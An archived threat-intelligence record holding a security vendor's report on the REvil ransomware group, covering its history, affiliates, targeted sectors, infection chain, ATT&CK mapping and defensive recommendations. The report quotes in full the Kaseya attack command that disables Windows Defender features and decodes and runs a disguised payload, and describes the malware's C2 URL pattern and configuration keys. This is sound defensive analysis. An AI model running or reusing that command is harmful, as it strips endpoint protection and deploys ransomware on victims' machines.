{
	"id": "73883cdd-31a6-4fb5-aaba-67588fb7c55d",
	"created_at": "2026-04-06T00:13:18.550962Z",
	"updated_at": "2026-04-10T13:12:22.211282Z",
	"deleted_at": null,
	"sha1_hash": "0b632b881921692851c990158e54e5aec5a2c050",
	"title": "Ransomware Spotlight: REvil",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 335484,
	"plain_text": "Ransomware Spotlight: REvil\r\nArchived: 2026-04-05 14:09:02 UTC\r\nWater Mare: REvil behind the scenes\r\nThe connection between Water Mare and REvil dates back to April 2019, its first confirmed deployment. In June 2019, it\r\nwas advertised by an actor with the username UNKN or Unknown (the same as REvil’s) on the XSS forum. It operated as an\r\naffiliate service: Affiliates spread the ransomware to victims while REvil operators maintained the malware and payment\r\ninfrastructure.\r\nIn 2020, Water Mare acquired new capabilities and accesses that would be used in future attacks thanks to its affiliates.\r\nThese capabilities include the PE injection capability using a PowerShell and the credential stealer KPOT stealer, which\r\nUNKN won in an auction for its source code. Affiliates also offered access to company networks and a VPN server. Around\r\nthis time UNKN also made efforts to limit affiliates to Russian-speaking members to prevent intrusion.\r\n2021 was a series of highs and lows for Water Mare, culminating in the arrest of several affiliates and the close\r\ndocumentation of REvil’s downfall. The early part of the year promised new developments such as the aforementioned plans\r\nfor  distributed denial-of-service (DDoS) attacks, which would have ushered in triple extortion tactics. However, REvil’s\r\nbiggest attacks — those that hit JBS and Kaseya — pushed law enforcement agencies to close in on the group’s heels.\r\nFBI later attributed the Kaseya and JBS attacks to the Water Mare intrusion set. They reportedly gained access to the Water\r\nMare intrusion set’s servers and retrieved the master key for REvil, which was provided to Kaseya. Around the same time,\r\ndistrust for the threat group began to take root, with an affiliate claiming to have been bypassed in the negotiation process\r\nusing a backdoor, foreshadowing REvil’s unraveling.\r\nDespite announcing its return in September, by October 2021 Water Mare’s data leak program became inaccessible and the\r\naffiliate program terminated. Suspected Water Mare affiliates were also being arrested or tracked down, thanks to the efforts\r\nof global law enforcement agencies.\r\nThe future of REvil operators\r\nUltimately, REvil’s activities placed it at the top of the list of ransomware operators that governments were eager to crack\r\ndown on. In a global effort, law enforcement went after REvil operators both offline and online, leading to the shutdown of\r\nits operations and actual arrests.\r\nBased on our findings from Water Mare, it is unlikely that the intrusion set will resurface under the name REvil because of\r\nthe amount of negative publicity this moniker had received given the following points:\r\nAffiliates doubted REvil's operations. The nature of REvil’s shutdown pointed to law enforcement and reports of a\r\nbackdoor that cheated them from ransom negotiations. Ultimately, this cast considerable doubt on the group’s\r\ncredibility among threat actors.\r\nREvil lacked leadership with the disappearance of UNKN. 0_neday, UNKN’s successor, was unable to inspire\r\nrenewed confidence in REvil operations. In contrast to UNKN’s efforts to prevent infiltration, 0_neday made serious\r\nerrors, such as failing to generate new private keys to the restored data leak site.\r\nREvil operated with reduced membership, which led to its shutdown. Efforts to attract affiliates again (such as\r\nmodifying affiliate profit cut to 90%) backfired, as these efforts were likely interpreted by other threat actors as a\r\nfinal desperate measure.\r\nWe surmise that the group can persist by rebranding, which is a common tactic among ransomware operators and which has\r\nbeen done by the group before. Case in point, DarkSide has renamed itself as BlackMatter. Meanwhile, REVil’s affiliates are\r\nlikely to move to other ransomware operators, if they have not done so already. As for its operators, it is probable that they\r\nwill continue to work or move to other ransomware operations, bringing their techniques with them. Therefore, for\r\norganizations wondering what’s next, there is still great value in understanding REvil tactics, techniques, and procedures\r\n(TTPs).\r\nAn overview of REvil operations\r\nOne aspect that made REvil’s operation infamous was its heavy extortion tacticsnews- cybercrime-and-digital-threats. As\r\nmentioned earlier, operators behind the ransomware group considered DDoS and got in touch directly with customers,\r\nbusiness partners, and the media to pressure victims into paying the ransom. They also auctioned stolen data to place more\r\nduress on their victims.\r\nREvil is also known for being an example of highly targeted ransomware, as it utilized tools based on its operators’ high-level knowledge of their targeted entities. This resulted in a varied arsenal and customized infection chains, as we elaborate\r\non later.\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil\r\nPage 1 of 7\n\nTo this end, REvil used tools like FileZilla to exfiltrate data and PsExec to propagate and remotely execute the ransomware\r\nand other files. It also used other tools and malware such as PC Hunter, AdFind, BloodHound, NBTScan, SharpSploit, third-party file sync tools, and Qakbot, a trojan used to deliver ransomware.\r\nTop affected industries and counties\r\nAs our detections show, REvil attacks were concentrated largely in the US, followed by Mexico and Germany by a wide\r\nmargin. This is consistent with evidence found in the code of REvil that purposely excludes countries in the Commonwealth\r\nof Independent States (CIS) as its targets. \r\nFigure 1. Countries with the highest number of attack attempts for the REvil ransomware (January 1 to December 6, 2021)\r\nSource: Trend Micro™ Smart Protection Network™ infrastructure\r\nWe saw the most REvil-related detections in the transportation industry, followed by the financial sector. In our reportnews-cybercrime-and-digital-threats summarizing ransomware activity in the first half of 2021, transportation was already among\r\nthe top three most targeted sectors, likely for its role in the supply chain and logistics. In general, the top targeted sectors are\r\nall critical industries, further emphasizing how REvil had been operating especially in 2021.\r\nFigure 2. Industries with the highest number of attack attempts for the REvil ransomware (January 1 to December 6, 2021)\r\nSource: Trend Micro Smart Protection Network infrastructure\r\nInfection chains and techniques\r\nDue to its targeted nature, REvil used a variety of tools and malware depending what the situation dictated. Its operators\r\nappeared to operate on a high-level of knowledge on their victim’s environment, as evidenced by the level of customization\r\nin its attacks. \r\nInitial Access\r\nThe threat actors behind REvil hired a variety of affiliates for their initial access. These ranged from those with malspam\r\nemails with spear-phishing links or attachments, RDP access and use of valid accounts, compromised websites, and exploits.\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil\r\nPage 2 of 7\n\nThese tactics then led to the download and execution of the payload using normal binaries like CertUtil, PowerShell, or via\r\nmacro. Threat actors could also take on a more targeted approach by using RDP and PsExec to take control of the network\r\nand then deploy the payload. Another recently observed initial access is also possible via supply chain compromise, which\r\ncould lead to the installation of Sodinstall or Sodinokibi, as observed in the Kaseya incident. \r\nDownload and Execution\r\nHere are some of the common ways the payload was downloaded and executed, based on what was observed and reported\r\npreviously: \r\nCVE-2019-2725open on a new tab led to the remote code execution (RCE) of CertUtil or PowerShell to download\r\nand execute REvil. There are also instances where REvil was loaded in memory of PowerShell via reflective load\r\ninstead of executing a binary.\r\nMalspam led to a macro that is used to download and execute REvil and malspam with an attachment (such as a\r\nPDF) that might drop or download Qakbot in order to download additional components or payloads.\r\nDrive-by compromise directly led to REvil. \r\nCVE-2018-13379open on a new tab, CVE-2019-11510open on a new tab, and valid accounts led to RDP and PsExec,\r\nthen to the dropping and execution of other components like the antivirus, exfiltration tools, and finally, REvil.\r\n• Another execution method was through DLL sideloading. This method used a legitimate executable such as\r\nMsMpeng.exe to load the REvil DLL that is named as a legitimate DLL like MpSvc.dll that is dropped by a custom\r\ninstaller detected as “SODINSTALL.”\r\nCVE-2021-30116, a zero-day vulnerability affecting the Kaseya VSA servers, was also used in the Kaseya supply\r\nchain compromise. The payload was dropped to Kaseya's TempPath with the file name agent.exe. The VSA\r\nprocedure used to deploy the encryptor was named \"Kaseya VSA Agent Hot-fix.” The \"Kaseya VSA Agent Hot-fix”\r\nprocedure ran the following:\r\n\"C:\\WINDOWS\\system32\\cmd.exe\" /c ping 127.0.0.1 -n 4979 \u003e nul \u0026\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring\r\n$true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true\r\n-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled\r\n-SubmitSamplesConsent NeverSend \u0026 copy /Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe \u0026 echo\r\n%RANDOM% \u003e\u003e C:\\Windows\\cert.exe \u0026 C:\\Windows\\cert.exe -decode c:\\\\agent.crt c:\\\\agent.exe \u0026 del /q /f\r\nc:\\kworking\\agent.crt C:\\Windows\\cert.exe \u0026 c:\\\\agent.exe”\r\nLateral Movement\r\nThis happened in the more targeted attack flow where the attackers made use of RDP and PsExec for lateral\r\nmovement. This is also where the ransomware and its other components were dropped and executed.\r\nDiscovery\r\nREvil was also known for using network discovery tools such as AdFind, SharpSploit, BloodHound, and NBTScan.\r\nThese tools were observed in recent REvil attacks.\r\nDefense Evasion\r\nPC Hunter and Process Hacker were observed to be present in the monitored campaigns and can be used to discover\r\nand terminate services and processes to disable antivirus products. These are among the legitimate toolsnews-cybercrime-and-digital-threats commonly weaponized by modern ransomware. \r\nKillAV, meanwhile, is a custom malicious binary designed to uninstall antivirus-related products by either querying\r\nthe uninstall registry and uninstalling the program associated, or by terminating processes from its list. \r\nA new variant of REvil included a Safeboot routine in its arsenal, which is triggered when “-smode” is supplied as\r\nargument for the new variant. These new variants created various RunOnce registries to restart from or to Safemode\r\nand bypass security solutions that do not work under Safemode, before proceeding unhindered with its encryption\r\nroutine. \r\nAside from execution, the DLL sideloading could also be used to evade detection by running under the context of a\r\nlegitimate file or process.\r\nIn the Kaseya supply chain compromise, PowerShell commands that were used to disable Windows Defender were\r\nalso observed.\r\nCredential Access, Exfiltration\r\nSharpSploit was observed to be one of the tools recently used. This is an attack framework with credential access\r\ncapabilities using Mimikatz module.\r\nGathered information was then sent back to the actors via different methods that were observed, such as the\r\ninstallation of FileZilla to facilitate an FTP transfer, or the use of third-party sync tools like MegaSync, FreeFileSync\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil\r\nPage 3 of 7\n\nand Rclone (64-bit).\r\nCommand and Control\r\nREvil would send a report and system info to its C\u0026C, which was done by generating a pseudorandom URL based on a\r\nfixed format and generation to add to a list of domains in its configuration. The URLs followed this format:\r\nhttps://{Domain}/{String 1}/{String 2}/{random characters}.{String 3}\r\nThe domain and the strings here meant the following: \r\nDomain: from a list based on the configuration \r\nString 1: wp-content, include, content, uploads, static, admin, data, or news \r\nString 2: images, pictures, image, temp, tmp, graphic, assets, or pics \r\nString 3: jpg, png, gif\r\nImpact\r\nThe impact and encryption process itself did not much since its inception.\r\nIt tried to escalate its privilege via an exploit (code is in the binary) or a token impersonation and create a mutex.\r\nIt decrypted its JSON config from one of its sections to learn how it would proceed with its routines. This\r\nconfiguration file was an encrypted JSON file located in a section of the decrypted binary. It would be decrypted\r\nusing the RC4 function. The JSON file contained the following configuration:\r\npk → base64 public encryption key of attacker\r\npid → personal id of the actor\r\nsub → campaign id\r\ndbg → debug mode\r\nfast → fast mode\r\nwipe → enable wipe of specific directories\r\nwht → whitelist dictionary\r\nfld → whitelisted folders\r\nfls → whitelisted filenames\r\next → whitelisted file extensions\r\nwfld → directories to wipe\r\nprc → processes to kill before the encryption\r\ndmn → domains to contact after encryption\r\nnet → send HTTP POST request to domains\r\nnbody → base64 encoded ransom note body\r\nnname → ransom note file name\r\nexp → run exploit if true\r\nimg → base64 encoded message on desktop background\r\nsvc → terminated services\r\nExamples of these routines included processes to terminate, C\u0026C to report to, and extension to use, among others.\r\nIt would then check the keyboard layout or the language of the affected system and avoid a certain list of countries. \r\nAfterward, it would create registry entries for keys, file extensions, and the stats after encryption. \r\nThe payload would then proceed with its encryption routine, which would be based on the configuration for files to\r\nencrypt, keys to use, processes or directories to terminate or delete, ransom note information, C\u0026C domains, and\r\nothers. \r\nLastly, it would proceed with deleting backups like shadow copies and report to its C\u0026C the status of the infection.\r\nMITRE tactics and techniques\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil\r\nPage 4 of 7\n\nInitial\r\nAccess\r\nExecution Persistence Privilege Escalation\r\nDefense\r\nEvasion\r\nDiscovery\r\nCredential\r\nAccess\r\nLateral\r\nMovement\r\nT1566 -\r\nPhishing\r\nArrives via\r\nphishing\r\nemails,\r\nsometimes\r\nwith Qakbot\r\nor IcedID\r\nT1190 -\r\nExploit\r\npublic-facing\r\napplication\r\nArrives via\r\nany the\r\nfollowing\r\nexploits:•\r\nCVE-2018-\r\n13379• CVE-2019-2725•\r\nCVE-2019-\r\n11510• CVE-2021-30116\r\nT1189 -\r\nDrive-by\r\ncompromise\r\nMakes use of\r\ncompromise\r\nwebsites like\r\nforums to\r\ndownload\r\nREvil when\r\naccessed\r\nT1195 -\r\nSupply chain\r\ncompromise\r\nCompromised\r\nKaseya VSA\r\nservers were\r\nused to push\r\nout REvil to\r\nvictims.\r\nT1078 -\r\nValid\r\naccounts\r\nHave been\r\nreported to\r\nmake used of\r\ncompromised\r\naccounts to\r\naccess\r\nvictims via\r\nRDP or\r\nRMMs\r\nT1106 - Execution\r\nthrough API\r\nUses native API to\r\nexecute various\r\ncommands/routines\r\nT1059  -\r\nCommand and\r\nscripting\r\ninterpreter\r\nUses various\r\nscripting\r\ninterpreters like\r\nPowerShell,\r\nWindows command\r\nshell and Visual\r\nBasic (macro in\r\ndocuments)\r\nT1129  - Shared\r\nmodules\r\nMade use of DLL\r\nsideloading to\r\nexecute REvil\r\nDLLs\r\nT1204 - User\r\nexecution\r\nUser execution is\r\nneeded to carry\r\nout the payload\r\nfrom the spear-phishing\r\nlink/attachments.\r\nT1547  -\r\nBoot or logon\r\nautostart\r\nexecution\r\nCreates\r\nregistry run\r\nentries for\r\nrestarting in\r\nsafe mode\r\nT1574 -\r\nHijack\r\nexecution\r\nflow\r\nHijacks the\r\nnormal\r\nexecution of\r\nMsMpeng.exe\r\nand\r\nMpSvc.dll via\r\nDLL-sideloading\r\ntechnique\r\nT1134 - Access token\r\nmanipulation\r\nUses\r\nImpersonateLoggedOnUser\r\nAPI to impersonate the\r\nsecurity context of the user\r\nwho is logged in \r\nT1068 - Exploitation for\r\nprivilege escalation\r\nMakes use of CVE-2018-\r\n8453 to escalate privilege\r\nT1574 - Hijack execution\r\nflow\r\nDepending on the privilege\r\ncontext of the normal\r\nexecutable file being\r\nabused, might also be used\r\nfor privilege escalation\r\nT1027 -\r\nObfuscated\r\nfiles or\r\ninformation\r\nSome\r\nvariants\r\n(or its\r\nconfig) are\r\nobfuscated\r\nto make\r\ndetection\r\nmore\r\ndifficult.\r\nSome\r\nvariants\r\nhave a\r\ncustom\r\npacker to\r\nmake\r\nanalysis or\r\ndetection\r\nmore\r\ndifficult.\r\nT1562 -\r\nImpair\r\ndefenses\r\nDisables\r\nsecurity-related\r\nsoftware by\r\nrunning in\r\nsafe mode\r\nor\r\nterminating\r\nthem\r\nT1574 -\r\nHijack\r\nexecution\r\nflow\r\nDLL\r\nsideloading\r\ncan also be\r\nused as a\r\nform of\r\ndefense\r\nevasion. \r\nT1083 - File\r\nand directory\r\ndiscovery\r\nSearches for\r\nspecific files\r\nand directory\r\nrelated to its\r\nencryption\r\nT1018 -\r\nRemote system\r\ndiscovery\r\nMakes use of\r\ntools for\r\nnetwork scans\r\nT1057 -\r\n Process\r\ndiscovery\r\nDiscovers\r\ncertain\r\nprocesses for\r\nprocess\r\ntermination\r\nT1082 -\r\n System\r\ninformation\r\ndiscovery\r\nIdentifies\r\nkeyboard\r\nlayout and\r\nother system\r\ninformation\r\nT1012 - Query\r\nregistry\r\nQueries\r\ncertain\r\nregistries as\r\npart of its\r\nroutine\r\nT1063 -\r\n Security\r\nsoftware\r\ndiscovery\r\nDiscovers\r\nsecurity\r\nsoftware for\r\nreconnaissance\r\nand\r\ntermination\r\nT1003 - OS\r\ncredential\r\ndumping\r\nMight\r\nutilize tools\r\nlike\r\nSharpSploit,\r\nwhich\r\ncontains\r\nMimikatz\r\nmodule\r\nT1552 -\r\nUnsecured\r\ncredentials\r\nMight\r\nutilize tools\r\nlike\r\nSharpSploit,\r\nwhich\r\ncontains\r\nMimikatz\r\nmodule \r\nT1570 -\r\nLateral too\r\ntransfer\r\nCan make\r\nuse of RDP\r\nor SMB\r\nadmin\r\nshares via\r\nPsExec to\r\ntransfer the\r\nransomwar\r\nor tools\r\nwithin the\r\nnetwork\r\nSummary of malware, tools, and exploits used\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil\r\nPage 5 of 7\n\nSecurity teams can watch out for the presence of the following malware tools and exploits that are typically used in REvil\r\nattacks:\r\nInitial Entry Execution Discovery\r\nPrivilege\r\nEscalation\r\nCredential Access\r\nLateral\r\nMovement\r\nDefense Evasion\r\nPhishing\r\nemails\r\nExploits:\r\nCVE-2018-\r\n13379\r\nCVE-2019-\r\n2725\r\nCVE-2019-\r\n11510\r\nCVE-2021-\r\n30116\r\nSodinstall\r\n(DLL\r\nsideloading)\r\nQakbot\r\nIcedID\r\nNetscan.exe\r\nNBTScan\r\nAdFind\r\nBloodHound\r\nSharpSploit\r\nKillAV\r\nCVE-2018-\r\n8453\r\nSodinstall\r\n(DLL\r\nsideloading)\r\nSharpSploit\r\nRDP\r\nPsExec\r\nKillAV\r\nProcess\r\nHacker\r\nPC Hunte\r\nSodinstal\r\n(DLL\r\nsideloadin\r\nRecommendations\r\nWhile REvil operations have been shut down, it is likely that organizations, government bodies, and perhaps even ordinary\r\nconsumers will not easily forget the consequences of its attack. Affiliates that have been involved in the attack could take up\r\nother ransomware operators, while REvil TTPs can be mimicked in newer campaigns. In the meantime, during the current\r\nshutdown, it is a good opportunity to learn from REvil as the group lies low.\r\nTo help defend systems against similar threats, organizations can establish security frameworks that can allocate resources\r\nsystematically for establishing a solid defense against ransomware.\r\nHere are some best practices that can be included in these frameworks:\r\nAudit and inventory\r\nTake an inventory of assets and data.\r\nIdentify authorized and unauthorized devices and software.\r\nMake an audit of event and incident logs.\r\nConfigure and monitor\r\nManage hardware and software configurations.\r\nGrant admin privileges and access only when necessary to an employee’s role.\r\nMonitor network ports, protocols, and services.\r\nActivate security configurations on network infrastructure devices such as firewalls and routers.\r\nEstablish a software allow list that only executes legitimate applications.\r\nPatch and update\r\nConduct regular vulnerability assessments.\r\nPerform patching or virtual patching for operating systems and applications.\r\nUpdate software and applications to their latest versions.\r\nProtect and recover\r\nImplement data protection, backup, and recovery measures.\r\nEnable multifactor authentication (MFA).\r\nSecure and defend\r\nEmploy sandbox analysis to block malicious emails.\r\nDeploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and\r\nnetwork.\r\nDetect early signs of an attack such as the presence of suspicious tools in the system.\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil\r\nPage 6 of 7\n\nUse advanced detection technologies such as those powered by AI and machine learning.\r\nTrain and test\r\nRegularly train and assess employees on security skills.\r\nConduct red-team exercises and penetration tests.\r\nA multilayered approach can help organizations guard the possible entry points into the system (endpoint, email, web, and\r\nnetwork). Security solutions can detect malicious components and suspicious behavior could help protect enterprises.\r\nTrend Micro Vision One™products provides multilayered protection and behavior detection, which helps block\r\nquestionable behavior and tools early on before the ransomware can do irreversible damage to the system.\r\nTrend Micro Cloud One™ Workload Securityproducts protects systems against both known and unknown threats that\r\nexploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine\r\nlearning. \r\nTrend Micro™ Deep Discovery™ Email Inspectorproducts employs custom sandboxing and advanced analysis\r\ntechniques to effectively block malicious emails, including phishing emails that can serve as entry points for\r\nransomware.\r\nTrend Micro Apex One™products offers next-level automated threat detection and response against advanced\r\nconcerns such as fileless threats and ransomware, ensuring the protection of endpoints.\r\nIndicators of Compromise\r\nThe IOCs for this article can be found hereopen on a new tab. Actual indicators might vary per attack.\r\nHIDE\r\nLike it? Add this infographic to your site:\r\n1. Click on the box below.   2. Press Ctrl+A to select all.   3. Press Ctrl+C to copy.   4. Paste the code into your page\r\n(Ctrl+V).\r\nImage will appear the same size as you see above.\r\nWe Recommend\r\nThe Industrialization of Botnets: Automation and Scale as a New Threat Infrastructurenews article\r\nComplexity and Visibility Gaps in Power Automatenews article\r\nCracking the Isolation: Novel Docker Desktop VM Escape Techniques Under WSL2news article\r\nAzure Control Plane Threat Detection With TrendAI Vision One™news article\r\nThe AI-fication of Cyberthreats: Trend Micro Security Predictions for 2026predictions\r\nRansomware Spotlight: DragonForcenews article\r\nStay Ahead of AI Threats: Secure LLM Applications With Trend Vision Onenews article\r\nThe Road to Agentic AI: Navigating Architecture, Threats, and Solutionsnews article\r\nSource: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil"
	],
	"report_names": [
		"ransomware-spotlight-revil"
	],
	"threat_actors": [
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434398,
	"ts_updated_at": 1775826742,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0b632b881921692851c990158e54e5aec5a2c050.pdf",
		"text": "https://archive.orkl.eu/0b632b881921692851c990158e54e5aec5a2c050.txt",
		"img": "https://archive.orkl.eu/0b632b881921692851c990158e54e5aec5a2c050.jpg"
	}
}